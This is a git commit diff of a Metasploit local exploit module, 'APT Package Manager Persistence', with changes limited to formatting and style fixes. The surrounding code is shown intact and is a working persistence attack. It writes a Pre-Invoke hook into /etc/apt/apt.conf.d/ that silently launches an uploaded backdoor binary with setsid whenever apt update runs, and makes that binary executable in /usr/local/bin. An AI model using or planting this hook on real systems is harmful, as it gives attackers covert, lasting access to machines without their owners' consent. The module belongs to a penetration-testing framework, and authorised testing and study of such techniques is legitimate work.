Updated some formatting as requested along with some rubocob requested

2019-04-25 15:55:22 -05:00 · 2019-04-25 15:55:22 -05:00 · bd1113d53c
parent 22c3fe35f7
commit bd1113d53c
1 changed files with 17 additions and 19 deletions
--- a/modules/exploits/linux/local/apt_package_manager_persistence.rb
+++ b/modules/exploits/linux/local/apt_package_manager_persistence.rb
@ -13,15 +13,15 @@ class MetasploitModule < Msf::Exploit::Local
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'APT Package Manager Persistence',
-      'Description'    => %q{
+      'Description'    => %q(
        This module will run a payload when the package manager is used. No
        handler is ran automatically so you must configure an appropriate
        exploit/multi/handler to connect. Module creates a pre-invoke hook
        for APT in apt.conf.d. The Hook name syntax is numeric followed by text.
-      },
+      ),
      'License'        => MSF_LICENSE,
-      'Author'         => [ 'Aaron Ringo' ],
-      'Platform'       => [ 'linux','unix' ],
+      'Author'         => ['Aaron Ringo'],
+      'Platform'       => ['linux', 'unix'],
      'Arch'           =>
        [
          ARCH_CMD,
@ -33,29 +33,28 @@ class MetasploitModule < Msf::Exploit::Local
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
-      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'SessionTypes'   => ['shell', 'meterpreter'],
      'DefaultOptions' => { 'WfsDelay' => 0, 'DisablePayloadHandler' => 'true' },
      'DisclosureDate' => 'Mar 9 1999', # Date Apt package manager was included in Debian
      'References'     => ['URL', 'https://unix.stackexchange.com/questions/204414/how-to-run-a-command-before-download-with-apt-get'],
-      'Targets'        => [ ['Automatic', {}] ],
+      'Targets'        => [['Automatic', {}]],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
-        OptString.new('HOOKNAME', [ true, 'Name of hook file to write', '05new-hook' ]),
-        OptString.new('BACKDOOR_NAME', [ false, 'Name of binary to write' ])
+        OptString.new('HOOKNAME', [true, 'Name of hook file to write', '05new-hook']),
+        OptString.new('BACKDOOR_NAME', [false, 'Name of binary to write'])
      ])

    register_advanced_options(
      [
-        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/usr/local/bin/' ])
+        OptString.new('WritableDir', [true, 'A directory where we can write files', '/usr/local/bin/'])
      ])
-    end
+  end

  def exploit
-
-    hook_path = "/etc/apt/apt.conf.d/"
+    hook_path = '/etc/apt/apt.conf.d/'
    unless writable? hook_path
      fail_with Failure::BadConfig, "#{hook_path} not writable, or apt is not on system"
    end
@ -68,12 +67,12 @@ class MetasploitModule < Msf::Exploit::Local
    backdoor_name = datastore['BACKDOOR_NAME'] || rand_text_alphanumeric(5..10)
    backdoor_path << backdoor_name

-    print_status("Attempting to write hook:")
+    print_status('Attempting to write hook:')
    hook_script = "APT::Update::Pre-Invoke {\"setsid #{backdoor_path} 2>/dev/null &\"};"
    write_file(hook_path, hook_script)

    unless exist? hook_path
-      fail_with Failure::Unknown, "Failed to write Hook"
+      fail_with Failure::Unknown, 'Failed to write Hook'
    end
    print_status("Wrote #{hook_path}")

@ -87,11 +86,10 @@ class MetasploitModule < Msf::Exploit::Local
      fail_with Failure::Unknown, "Failed to write #{backdoor_path}"
    end
    print_status("Backdoor uploaded #{backdoor_path}")
-    print_status("Backdoor will run on next Apt update")
+    print_status('Backdoor will run on next Apt update')

    # permissions chosen to reflect common perms in /usr/local/bin/
-    chmod(backdoor_path, 0755)
-
+    chmod(backdoor_path, 0755) 
+  
  end
-end
-
+end